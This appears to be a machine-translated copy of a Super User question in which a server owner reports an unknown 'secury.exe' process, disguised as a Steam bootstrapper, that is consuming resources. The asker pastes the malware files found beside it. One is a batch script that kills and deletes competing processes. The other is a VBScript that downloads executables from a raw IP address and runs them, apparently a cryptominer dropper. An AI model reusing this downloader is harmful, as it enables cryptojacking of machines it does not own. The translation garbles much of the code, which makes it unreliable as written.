• Главная
    • /
  • Блог
    • /
  • παράθυρα - Πώς να σκοτώσει μόνιμα bootstrapper πελάτη ατμού - Super χρήστη

παράθυρα - Πώς να σκοτώσει μόνιμα bootstrapper πελάτη ατμού - Super χρήστη

Έχω την ακόλουθη κατάσταση στο διευθυντή της δουλειάς μου:

Έχω την ακόλουθη κατάσταση στο διευθυντή της δουλειάς μου:

Δεν ξέρω τι είδους εφαρμογή είναι, αλλά σίγουρα δεν είναι bootstrapper πελάτη Steam επειδή δεν το εγκατέστησα και επίσης δεν μπορώ να τον απεγκαταστήσω.

Αν προσπαθήσω να καταλάβω τι είδους εφαρμογή είναι μέσω αυτού του βήματος:

Βλέπω κάτι τέτοιο:

Στο βοηθητικό πρόγραμμα MS Config δεν βρήκα τίποτα που μοιάζει με το αρχείο secury.exe.

Όταν ανοίγω τη θέση του αρχείου, βλέπω τρία αρχεία:

m.bat, b.exe, 4.vbs.

Παρακάτω πηγαίνει το περιεχόμενο του m.bat:

Εργασία / Taskill / f / t / im Security.exe c: \ ProgramData \ secury.exe taskkill / f / t / im kingsoft.exe taskkill / f / t / im expl0rer.exe taskkill / f / t / im ieplare.exev taskkill / f / t / im / n / t / im / / / / / / / / Process.exe taskkill / f / t / im winlnlt.exe taskkill / f / t / im Taskkill / f / t / im Taskkill / f / t / im msdc.exe taskkill / f / t / im Taskill Fddlere.exe / f / t / im lqrtqe.exe taskkill / f / t / im apkls.exe taskkill / f / t / im winlog.exe taskkill / f / t / im svchosts.exe taskkill / f / t / im win1ogins.exe taskkill / f / t / im shovsts.exe taskkill / f / t / im fcty.exe taskkill / f / t / im soiuos.exe taskkill / f / t / im TrustedInstaller.exe C: \ Windows \ System32 \ soiuos.exe del C: \ Windows \ Setup \ TrustedInstaller.exe del C: \ ProgramData \ kingsoft.exe del C: \ ProgramData \ expl0rer.exe C: \ ProgramData \ ieplare.exe C: \ ProgramData \ nssm.exe del C: \ Πρόγραμμα δεδομένων \ MSASCui.exe del C: \ Pro gramData \ SystemSettlngs.exe del C: \ ProgramData \ SystemSetting.exe del C: \ ProgramData \ Process.exe del C: \ ProgramData \ winlnlt.exe del C: \ ProgramData \ WindowsUpgrade.exe del C: \ ProgramData \ msdc.exe del C: \ ProgramData \ Fiddlere.exe del C: \ ProgramData \ shovst.exe del C: \ ProgramData \ lqrtqe.exe del C: \ ProgramData \ apkls.exe C: \ ProgramData \ winlog.exe del C: \ ProgramData \ svchosts.exe del C: \ ProgramData \ win1ogins.exe del C: \ ProgramData \ shovsts.exe del C: \ ProgramData \ fcty.exe del C: \ ProgramData \ pool.exe del C: \ ProgramData \ pool2.exe C: \ ProgramData \ pool3.exe

Επόμενο πηγαίνει 4.vbs:

Ορίστε το xPost = CreateObject ("Microsoft.XMLHTTP") xPost.Open "GET", "http://223.68.209.7:65510/2.exe", 0 xPost.Send () Ορισμός sGet = CreateObject ("ADODB.Stream" ) sGet.Mode = 3 sGet.Type = 1 sGet.Open () sGet.Write (xPost.responseBody) sGet.SaveToFile "c: \ ProgramData \ s2.exe", 2 Ρύθμιση xPost = CreateObject ("Microsoft.XMLHTTP" xPost.Open "GET", "http://223.68.209.7:65510/pool.exe", 0 xPost.Send () Ορισμός sGet = CreateObject ("ADODB.Stream") sGet.Mode = 3 sGet.Type = 1 sGet.Open () sGet.Write (xPost.responseBody) sGet.SaveToFile "c: \ ProgramData \ pool2.exe", 2 CreateObject ("WScript.Shell") Εκτελέστε "C: \ ProgramData \ pool3.exe" CreateObject "WScript.Shell") Εκτελέστε "del C: \ ProgramData \ pool3.exe"

Τι μπορώ να κάνω για να σταματήσω το secury.exe από την κατάχρηση των υπολογιστικών εξουσιών του διακομιστή μου;

PS Έχω εκτελέσει Avast πλήρη έλεγχο του υπολογιστή μου, αλλά δεν βρήκα τίποτα λάθος.